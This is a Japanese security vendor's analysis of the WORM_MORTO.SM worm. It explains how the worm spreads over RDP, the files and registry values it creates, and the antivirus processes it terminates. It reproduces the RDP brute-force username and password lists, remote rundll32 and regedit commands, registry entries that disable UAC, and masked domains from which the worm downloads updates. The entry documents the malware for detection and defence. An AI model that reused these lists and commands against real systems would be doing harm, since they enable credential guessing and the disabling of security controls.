WORM_MORTO.SM

トレンドマイクロは、このワームをNoteworthy（要注意）に分類しました。

ワームは、「リモート・デスクトップ・プロトコル（RDP）」を利用して自身の感染を拡げます。RDPとは、ターミナルサービスを使用してコンピュータがサーバに接続する際にコンピュータとサーバ間の通信に用いられるプロトコルです。

ワームは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。 ワームは、他のマルウェアに作成され、コンピュータに侵入します。

ワーム マルウェアは、自身（コンピュータに侵入して最初に自身のコピーを作成した ワーム ）を削除します。

侵入方法

ワームは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

ワームは、以下のマルウェアに作成され、コンピュータに侵入します。

• WORM_MORTO.SMA

インストール

ワームは、感染したコンピュータ内に以下のように自身のコピーを作成します。

• %Windows%\clb.dl
• %Windows%\Offline Web Pages\cache.txt

(註：%Windows%はWindowsの種類とインストール時の設定などにより異なります。標準設定では、Windows9x、Me、XP、Server 2003の場合、"C:\Window"、WindowsNT および 2000の場合、"C:\WINNT" です。)

ワームは、以下のファイルを作成します。

• %System%\Sens32.dll

(註：%System%はWindowsの種類とインストール時の設定などにより異なります。標準設定では、Windows 98 および MEの場合、"C:\Windows\System"、Windows NT および 2000 の場合、"C:\WinNT\System32"、Windows XP および Server 2003 の場合、"C:\Windows\System32" です。)

ワームは、以下の無害なファイルを作成します。

• %Windows%\Offline Web Pages\%yyyy-mm-dd%

(註：%Windows%はWindowsの種類とインストール時の設定などにより異なります。標準設定では、Windows9x、Me、XP、Server 2003の場合、"C:\Window"、WindowsNT および 2000の場合、"C:\WINNT" です。)

ワームは、以下のプロセスに自身を組み込み、システムのプロセスに常駐します。

• svchost.exe

他のシステム変更

ワームは、インストールの過程で、以下のレジストリ値を追加します。

HKEY_LOCAL_MACHINE\SYSTEM\WPA
it = "{hex values}"

HKEY_LOCAL_MACHINE\SYSTEM\WPA
id = "1293D1C15VAVUJTN"

HKEY_LOCAL_MACHINE\SYSTEM\WPA
ie = "%current folder%\{malware name}.exe"

HKEY_LOCAL_MACHINE\SYSTEM\WPA
md = "{garbage code}"

HKEY_LOCAL_MACHINE\SYSTEM\WPA
sn = "6to4"

HKEY_LOCAL_MACHINE\SYSTEM\WPA
sr = "Sens"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Control\Windows
NoPopUpsOnBoot = "1"

プロセスの終了

ワームは、感染コンピュータ上でプロセスが常駐されていることを確認した場合、以下のいずれかの文字列を含むプロセスまたはサービスを終了します。

• ACAAS
• ArcaConfSV
• AvastSvc
• FPAVServer
• FortiScand
• GDFwSvc
• K7RTScan
• KVSrvXP
• MPSvc
• MsMpEng
• NSESVC.EXE
• PavFnSvr
• RavMonD
• SavService
• SpySweeper
• Vba32Ldr
• a2service
• avgwdsvc
• avpmapp
• ccSvcHst
• cmdagent
• coreServiceShell
• freshclam
• fsdfwd
• knsdave
• kxescore
• mcshield
• scanwscs
• vsserv

その他

ワーム は、自身（コンピュータに侵入して最初に自身のコピーを作成した ワーム ）を削除します。

ワームは、以下のように自身のコピーのバックアップを作成します。

• %Windows%\clb.dll.bak

Windowsは通常、＜Windowsフォルダ＞を読み込んだ後、＜Windowsシステムフォルダ＞を読み込みます。そのため、不正なDLLファイル "%Windows%\clb.dll" を作成することにより、"regedit.exe" が実行されるたびに、正規のファイル "%System%\clb.dll" が読み込まれる前に不正な "%Windows%\clb.dll" が読み込まれることになります。

ワームは、使用可能なリモートデスクトップのために、RDPのポートであるTCPポート3389番で待機します。ワームは、リモート・デスクトップ・サーバを検索し、ユーザ名およびパスワードを用いることで、管理者としてログインを試みます。以下は、ログインを試みるユーザ名です。

• actuser
• admin
• admin1
• admin123
• admin2
• administrator
• aspnet
• backup
• computer
• console
• david
• dragon
• guest
• owner
• princess
• server
• support
• support_388945a0
• test1
• test2
• test3
• user1
• user2
• user3
• user4
• user5

以下は、ログインを試みるパスワードです。

• !@#$%
• $1234
• %u%111111
• %u%12
• %u%123
• %u%1234
• %u%123456
• 000000
• 111111
• 1111111
• 111222
• 112233
• 11223344
• 121212
• 123123
• 123321
• 12344321
• 12345
• 123456
• 1234567
• 12345678
• 123456789
• 1234567890
• 1234qwer
• 1314520
• 159357
• 168168
• 1q2w3e
• 1qaz2wsx
• 22222222
• 31415926
• 520520
• 654321
• 666666
• 7777777
• 77777777
• 789456
• 888888
• 88888888
• 987654
• 987654321
• 999999
• 1234
• PASSWORD
• Password
• Z1234
• abc123
• abcd1234
• actuser
• admin
• admin1
• admin123
• admin2
• administrator
• aspnet
• backup
• computer
• console
• david
• dragon
• guest
• iloveyou
• letmein
• owner
• password
• princess
• qazwsx
• rockyou
• secret
• server
• super
• support
• support_388945a0
• test1
• test2
• test3
• user1
• user2
• user3
• user4
• user5
• zxcvbnm

ワームは、遠隔で接続すると、以下のリモートコマンドを用いることにより、DLLファイルとして "%Windows%\clb.dll" を一時ドライブ "A:" 内に複製します。

• rundll32 \\tsclient\a\a.dll a

ワームは、リモートコマンド「regedit /s \\tsclient\a\r.reg」を用いることにより、上記のパス内に以下の内容を含む "r.reg" を作成します。

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Policies\System]
ConsentPromptBehaviorAdmin=dword:0
EnableLUA=dword:0

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\
CurrentVersion\AppCompatFlags\Layers] c:\\windows\\system32\\rundll32.exe=RUNASADMIN d:\\windows\\system32\\rundll32.exe=RUNASADMIN e:\\windows\\system32\\rundll32.exe=RUNASADMIN f:\\windows\\system32\\rundll32.exe=RUNASADMIN g:\\windows\\system32\\rundll32.exe=RUNASADMIN h:\\windows\\system32\\rundll32.exe=RUNASADMIN i:\\windows\\system32\\rundll32.exe=RUNASADMIN c:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN d:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN e:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN f:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN g:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN h:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN i:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN c:\\winnt\\system32\\rundll32.exe=RUNASADMIN c:\\win2008\\system32\\rundll32.exe=RUNASADMIN c:\\win2k8\\system32\\rundll32.exe=RUNASADMIN c:\\win7\\system32\\rundll32.exe=RUNASADMIN c:\\windows7\\system32\\rundll32.exe=RUNASADMIN

ワームは、以下のWebサイトから自身のコピーの更新版をダウンロードします。

• http:\\＜ドメイン＞\160.rar

＜ドメイン＞は、以下のとおりです。

• {BLOCKED}r.{BLOCKED}o.be
• {BLOCKED}r.{BLOCKED}o.cc
• {BLOCKED}r.info
• {BLOCKED}r.net
• {BLOCKED}l.{BLOCKED}o.be
• {BLOCKED}l.{BLOCKED}o.cc
• {BLOCKED}l.net
• {BLOCKED}0.{BLOCKED}.38.82